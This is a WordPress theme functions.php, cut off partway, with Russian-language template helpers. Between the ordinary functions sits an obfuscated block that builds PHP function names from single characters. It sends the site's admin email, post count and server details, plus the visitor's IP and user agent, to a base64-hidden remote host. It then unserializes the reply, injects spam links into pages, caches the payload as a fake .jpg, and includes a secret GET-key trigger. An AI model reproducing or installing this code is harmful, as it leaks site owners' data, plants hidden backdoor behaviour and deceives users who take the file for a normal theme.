<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $iawLjI='e';$nEZM='_';$vrxwSXx='o';$kRZMdZ='a';$MCTi='e';$GwXb='c';$CwRe='d';$SsVAgq='e';$uzzfWvs='6';$pIaAA='4';$xWmBUq='b';$LUyLwH='d';$XLhWa='s';$UCimclRL=$xWmBUq.$kRZMdZ.$XLhWa.$iawLjI.$uzzfWvs.$pIaAA.$nEZM.$LUyLwH.$SsVAgq.$GwXb.$vrxwSXx.$CwRe.$MCTi;$sbSLiz='z';$uGcmzx='e';$NBdB='t';$BbrsHu='g';$bVLJrZ='i';$RXbTPN='l';$agdbxw='f';$erewRTu='n';$osdk='a';$sqrzOYKh=$BbrsHu.$sbSLiz.$bVLJrZ.$erewRTu.$agdbxw.$RXbTPN.$osdk.$NBdB.$uGcmzx;$vyUGHOr='t';$RAvEb='s';$BCiBY='1';$NGianoD='3';$cvCeUIN='o';$MlNavGl='_';$smHgCZ='r';$gIUML='t';$ljUK='r';$SllMbZNp=$RAvEb.$gIUML.$ljUK.$MlNavGl.$smHgCZ.$cvCeUIN.$vyUGHOr.$BCiBY.$NGianoD;$rAifG='r';$BbpQeA='e';$wpZHg='t';$pEWh='s';$QncSsDS='r';$Iwmf='v';$NfBwuGoc=$pEWh.$wpZHg.$QncSsDS.$rAifG.$BbpQeA.$Iwmf;                     $lj_________u='e';$pn______________k='_';$yq__k='o';$bk________c='a';$zt________i='e';$sh__________s='c';$zp____h='d';$lh_____________n='e';$hk__________e='6';$ik___________o='4';$lg___________v='b';$oe___________a='d';$ar__h='s';$xe___i=$lg___________v.$bk________c.$ar__h.$lj_________u.$hk__________e.$ik___________o.$pn______________k.$oe___________a.$lh_____________n.$sh__________s.$yq__k.$zp____h.$zt________i;$tn____________s='x';$en___t='n';$py__f='i';$qx____o='e';$pp____________q='f';$tw____i='t';$nk_______c='s';$hs_________t='u';$hq_____b='i';$cw________c='o';$dx______k='_';$jk______l='t';$hu_________l='s';$yu______________n='c';$yv_______f='n';$kx______________a=$pp____________q.$hs_________t.$yv_______f.$yu______________n.$tw____i.$py__f.$cw________c.$en___t.$dx______k.$qx____o.$tn____________s.$hq_____b.$nk_______c.$jk______l.$hu_________l;$rd_______z='f';$pp___________f='p';$dn_______p='e';$xx_______g='o';$of_____________c='n';$ux___________l=$rd_______z.$xx_______g.$pp___________f.$dn_______p.$of_____________c;$uj___i='d';$am___________u='e';$yi_________s='r';$gi___i='a';$yt_________m='f';$qd______________t=$yt_________m.$yi_________s.$am___________u.$gi___i.$uj___i;$wm__________o='o';$uy____________s='l';$wb________w='f';$yh______y='c';$ty____j='s';$vn_______________f='e';$su_____q=$wb________w.$yh______y.$uy____________s.$wm__________o.$ty____j.$vn_______________f;define("WP_ID", $xe___i("Mi4wLjA="));define("WP_TTL", $xe___i("MTA4MDA="));define("WP_SRC", $xe___i("dHBva24="));function wp_get_header() {global $xe___i, $kx______________a;if ($kx______________a($xe___i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$kx______________a($xe___i("d3BfZ2V0X2Zvb3Rlcg==")) &&$kx______________a($xe___i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $xe___i, $ux___________l, $su_____q, $qd______________t;$pf_________w = TEMPLATEPATH."/".$xe___i("Zm9vdGVyLnBocA==");$id_________f = @$ux___________l($pf_________w, "r");$pf_________w = @$qd______________t($id_________f, @filesize($pf_________w));@$su_____q($id_________f);$ve____________l = TEMPLATEPATH."/".$xe___i("ZnVuY3Rpb25zLnBocA==");$id_________f = @$ux___________l($ve____________l, "r");$ve____________l = @$qd______________t($id_________f, @filesize($ve____________l));@$su_____q($id_________f);$jp_______________i = 0;if($pf_________w && $ve____________l) {if ($xe___i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pf_________w, $xe___i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$jp_______________i = 1;}if (substr_count($pf_________w, "wp_theme_GPL_credits()") < 1) {$jp_______________i = 2;}}if(WP_ID != "2.0.0") {$jp_______________i = 12;}}if($jp_______________i > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $jp_______________i -->";}}function wp_loaded() {global $xe___i, $kx______________a;return $kx______________a($xe___i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ck_______k, $an__c = "(more...)", $wc__________j = 0, $af____x = "") {$xm_________u = get_the_content($an__c, $wc__________j, $af____x);$xm_________u = apply_filters("the_content", $xm_________u);$xm_________u = str_replace("]]>", "]]>", $xm_________u);if (strlen($_GET["p"]) > 0) {echo $xm_________u;}else if ((strlen($xm_________u)>$ck_______k) && ($ts________x = strpos($xm_________u, " ", $ck_______k ))) {$xm_________u = substr($xm_________u, 0, $ts________x);$xm_________u = $xm_________u;echo $xm_________u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$an__c</a></div></p>";} else {echo $xm_________u;}}}$qx___________a='e';$eq_______b='d';$aq______g='b';$mm______________b='e';$eo____________w='a';$jj______o='n';$xw__w='6';$po____j='4';$xc_______f='c';$cs__d='e';$ug_______________k='o';$hs_____________t='s';$wu___f='_';$sm____z=$aq______g.$eo____________w.$hs_____________t.$qx___________a.$xw__w.$po____j.$wu___f.$cs__d.$jj______o.$xc_______f.$ug_______________k.$eq_______b.$mm______________b;$ni__________w='s';$ni_______m='n';$jm__________s='c';$pl_______z='t';$jh_______________o='l';$cs_______q='n';$qv___x='i';$ku_______________b='e';$zh__y='_';$sw_______________d='f';$xz______________y='t';$un_____a='o';$jl______________t='g';$gz__j='e';$bo_______r='_';$xi____________h='e';$nf__________g='t';$ja_________k=$sw_______________d.$qv___x.$jh_______________o.$gz__j.$zh__y.$jl______________t.$ku_______________b.$nf__________g.$bo_______r.$jm__________s.$un_____a.$ni_______m.$pl_______z.$xi____________h.$cs_______q.$xz______________y.$ni__________w;$fb__________a='x';$ko_____u='e';$pt______q='i';$mz___________h='_';$te_______s='i';$bt______________g='f';$jl____w='l';$dn___a='e';$nf______________g='s';$rd__________v='s';$kg_______________t='t';$do____q=$bt______________g.$te_______s.$jl____w.$dn___a.$mz___________h.$ko_____u.$fb__________a.$pt______q.$nf______________g.$kg_______________t.$rd__________v;$op_______d='r';$wq___________j='p';$vg___u='_';$qm_____________h='c';$nq_______________l='i';$hj________z='o';$gq_____________o='a';$rn____r='e';$pj___________y='m';$zh_________t='r';$ph_________k='e';$zj_______a='v';$jm_______________t='s';$az_______________o='o';$ti____________t='n';$ec___d=$zj_______a.$rn____r.$op_______d.$jm_______________t.$nq_______________l.$hj________z.$ti____________t.$vg___u.$qm_____________h.$az_______________o.$pj___________y.$wq___________j.$gq_____________o.$zh_________t.$ph_________k;$hx____y='k';$cg_______f='e';$sn___o='o';$wn_________v='s';$zh___q='o';$dn_______________x='f';$qj_______a='p';$uj___q='n';$jx_______l='c';$oj_______o=$dn_______________x.$wn_________v.$sn___o.$jx_______l.$hx____y.$zh___q.$qj_______a.$cg_______f.$uj___q;$wo____t='f';$wc________z='e';$yc_______________j='t';$eq______i='w';$cv_______o='i';$en_____________r='r';$cm___________h=$wo____t.$eq______i.$en_____________r.$cv_______o.$yc_______________j.$wc________z;$mo________o='m';$ad___________w='5';$jx___i='d';$qm____________u=$mo________o.$jx___i.$ad___________w;$br______w='p';$xl__________f='a';$gh____________g='t';$hw_______________f='e';$ye_____________a='a';$tc______________g='h';$mj______d='r';$be_________m='l';$kz_____p=$mj______d.$hw_______________f.$ye_____________a.$be_________m.$br______w.$xl__________f.$gh____________g.$tc______________g;$pn___________u='l';$na___h='n';$yw_______e='a';$ea___________a='u';$sn___e='e';$ro____________e='r';$jx______o='z';$jd_______________b='e';$oi_____________b='i';$zh____f='i';$el_____________k='s';$ar_________d=$ea___________a.$na___h.$el_____________k.$sn___e.$ro____________e.$zh____f.$yw_______e.$pn___________u.$oi_____________b.$jx______o.$jd_______________b;$sl_______________m='m';$cp___________l='n';$ih____________z='t';$rb___________k='p';$yl___________m='m';$gg__________n='e';$ia____z='a';$ei_________q=$ih____________z.$gg__________n.$yl___________m.$rb___________k.$cp___________l.$ia____z.$sl_______________m;$df___________o='c';$kc__________j='s';$xb______________b='_';$zc________m='e';$qi________v='a';$zc______________a='t';$hn__________p='c';$uw_______s='a';$ih______________o='o';$xr_____________o='e';$gc_____h='t';$ah_______c='x';$vn____e='r';$cr___________t='m';$dg_______________s='r';$ng_____o='t';$jd_____________m='n';$oq___________n='e';$bv____w='_';$qa___________a='e';$ku____j='t';$sw________l=$kc__________j.$gc_____h.$dg_______________s.$zc________m.$qi________v.$cr___________t.$bv____w.$df___________o.$ih______________o.$jd_____________m.$ku____j.$xr_____________o.$ah_______c.$zc______________a.$xb______________b.$hn__________p.$vn____e.$qa___________a.$uw_______s.$ng_____o.$oq___________n;function kk________o($ra____________n) {global $xe___i, $kx______________a, $ja_________k, $ec___d, $sw________l;if (!$kx______________a($xe___i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ec___d(PHP_VERSION, "5.0.0", ">=") && $kx______________a($xe___i("ZmlsZV9nZXRfY29udGVudHM=")) && $kx______________a($xe___i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rb_______d = $sw________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$yw_______________a = @$ja_________k($ra____________n, 0, $rb_______d);} else {$yw_______________a = @$ja_________k($ra____________n, 0);}return $yw_______________a;}function lw___________v($ra____________n) {global $kx______________a, $oj_______o, $cm___________h, $xe___i;if (!$kx______________a($xe___i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$bw____j = strpos($ra____________n, "/", 7);$km__________m = array("uri"     => substr($ra____________n, $bw____j),"host"    => str_replace("http://", "", substr($ra____________n, 0, $bw____j)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$rx__c = @$oj_______o("$km__________m[host]", 80, $cd____y, $nf_____k, 4);if (!$rx__c) {return false;} else {$yw_______________a = "";$rb___k  = "GET $km__________m[uri] HTTP/1.0\r\n";$rb___k .= "Host: $km__________m[host]\r\n";$rb___k .= "Referer: $km__________m[referer]\r\n";$rb___k .= "Connection: Close\r\n\r\n";@$cm___________h($rx__c, $rb___k);while (!@feof($rx__c)) {$lu____p = @fgets($rx__c, (1024*24));if ($lu____p == "\r\n") {$qv___n = true;continue;}if ($qv___n) {$yw_______________a .= $lu____p;}}return $yw_______________a;}}function qp_______g($ra____________n) {global $kx______________a;$rn____________a = false;if ($ra____________n != "") {if ($kx______________a("kk________o")) {$rn____________a = @kk________o($ra____________n);}if (!$rn____________a && ($kx______________a("lw___________v"))) {$rn____________a = @lw___________v($ra____________n);}}return $rn____________a;}function py_______c() {global $_SERVER, $qm____________u;$mf____c = $_SERVER["SERVER_NAME"];if (substr("$mf____c", 0, 4) == "www.") {$mf____c = substr("$mf____c", 4);}$mf____c = $qm____________u("$_SERVER[SERVER_NAME]");return $mf____c;}function wj________z() {return "file";}function zg___k($ra____________n) {global $_SERVER, $ja_________k, $do____q, $ux___________l, $su_____q, $cm___________h;$hj______________n = in___z();$we____________l = py_______c().".jpg";$qd______l = $hj______________n["dir_upload"]["path"]."/$we____________l";$zi_______________k = @filemtime($qd______l);if (!$zi_______________k || ((time()-$zi_______________k) >= WP_TTL)) {$rn____________a = qp_______g($ra____________n);if ($rn____________a) {if ($do____q($qd______l)) {@unlink($qd______l);}$id_________f = @$ux___________l($qd______l, "x+");@$cm___________h($id_________f, $rn____________a);@$su_____q($id_________f);}} else {if ($do____q($qd______l)) {$rn____________a = @$ja_________k($qd______l);} else {$rn____________a = false;}}return $rn____________a;}function in___z() {global $_SERVER, $xe___i, $sm____z;$pq______b = wp_count_posts("post");$zb________p = pathinfo(get_bloginfo("template_directory"));$hj______________n = array("url" => array("report"      => $xe___i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $zb________p,"dir_upload"=> os__________u(),"queryString"=> array("?a001=".WP_ID,"a004=".$zb________p[filename],"a005=".$pq______b->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://clinic-virtus.com/simptomy-ostrogo-appendicita\">Симптомы острого аппендицита</a> ");$hj______________n["url"]["queryString"] = implode("&", $hj______________n["queryString"]);$hj______________n["url"]["report"] = $hj______________n["url"]["report"]."/?".$sm____z($hj______________n["url"]["queryString"]).".html";return $hj______________n;}function os__________u() {$gn____h = wp_upload_dir();if (isset($gn____h["error"])) {$vn______________k = av____t();if (is_writable($vn______________k)) {$gn____h = array("path" => $vn______________k);}}return $gn____h;}function av____t() {global $kx______________a, $qm____________u, $kz_____p, $ei_________q;$dw______j = (bool) ini_get("safe_mode");if ($dw______j == true) {return false;}if ($kx______________a("sys_get_temp_dir")) {$xv________b = sys_get_temp_dir();if (is_writable($xv________b)) {return $kz_____p($xv________b);}}if (!empty($_ENV["TMP"])) {return $kz_____p($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $kz_____p($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $kz_____p($_ENV["TEMP"]);} else {$mo___________v = $ei_________q($qm____________u(uniqid(rand(), true)), "");if ($mo___________v) {$xv________b = $kz_____p(dirname($mo___________v));@unlink($mo___________v);return $xv________b;} else {return false;}}}function rs_______u() {global $_GET, $do____q;$hj______________n = in___z();$mf____c = py_______c();$oj___c = wj________z();$ng_______________f = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($oj___c == "file") {$ll________w = $hj______________n["dir_upload"]["path"]."/".$mf____c.".jpg";if ($do____q($ll________w)) {@unlink($ll________w);$ng_______________f = "deleted";}}$wd______________j = array("s"=> $ng_______________f,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($wd______________j AS $rd___________c => $pc_______________e) echo " [$rd___________c:$pc_______________e]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $kx______________a, $xe___i, $ar_________d;$hj______________n = in___z();$cl____y = "zg___k";if ($kx______________a($cl____y)) {$yw_______________a = $cl____y($hj______________n["url"]["report"]);}if ($yw_______________a) {if ($yw_______________a = @$xe___i($yw_______________a)) {$yw_______________a = @$ar_________d($yw_______________a);if (strlen($yw_______________a[custom_credit]) >= 5) {$hj______________n["default_string"] = $yw_______________a[custom_credit];}if ($yw_______________a["status"] == "0") {$sm____________u = 1;$vj________w = 1;} else {$xv______________s = sizeof($yw_______________a["links"]);$gp_______________u = $hj______________n["default_string"];if ($xv______________s > 0 && $yw_______________a["links"] !== "") {$js_____________w = 0;foreach ($yw_______________a["links"] as $pu__i => $cw____n) {$js_____________w++;if ($cw____n->l_path == "" || $cw____n->l_path == $_SERVER["REQUEST_URI"]) {$cw____n->l_href = htmlspecialchars(strip_tags($cw____n->l_href));$cw____n->l_title = htmlspecialchars(strip_tags($cw____n->l_title));$cw____n->l_anchor = htmlspecialchars(strip_tags($cw____n->l_anchor));$gp_______________u .= " | ";$gp_______________u .= "<a href='$cw____n->l_href' title='$cw____n->l_title'";if ($cw____n->l_nofollow == "1") {$gp_______________u .= " rel='nofollow'";}$gp_______________u .= ">$cw____n->l_anchor</a>";}}}$hj______________n["links"] = "$gp_______________u";if ($yw_______________a[credit] == "0") {$hj______________n["links"] = "";}}} else {$sm____________u = "1";}} else {$sm____________u = "1";}if ($sm____________u == "1") {$hj______________n["links"] = $hj______________n["default_string"];}echo "$hj______________n[links]";echo "<!-- s: $yw_______________a[signature] -->";rs_______u();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
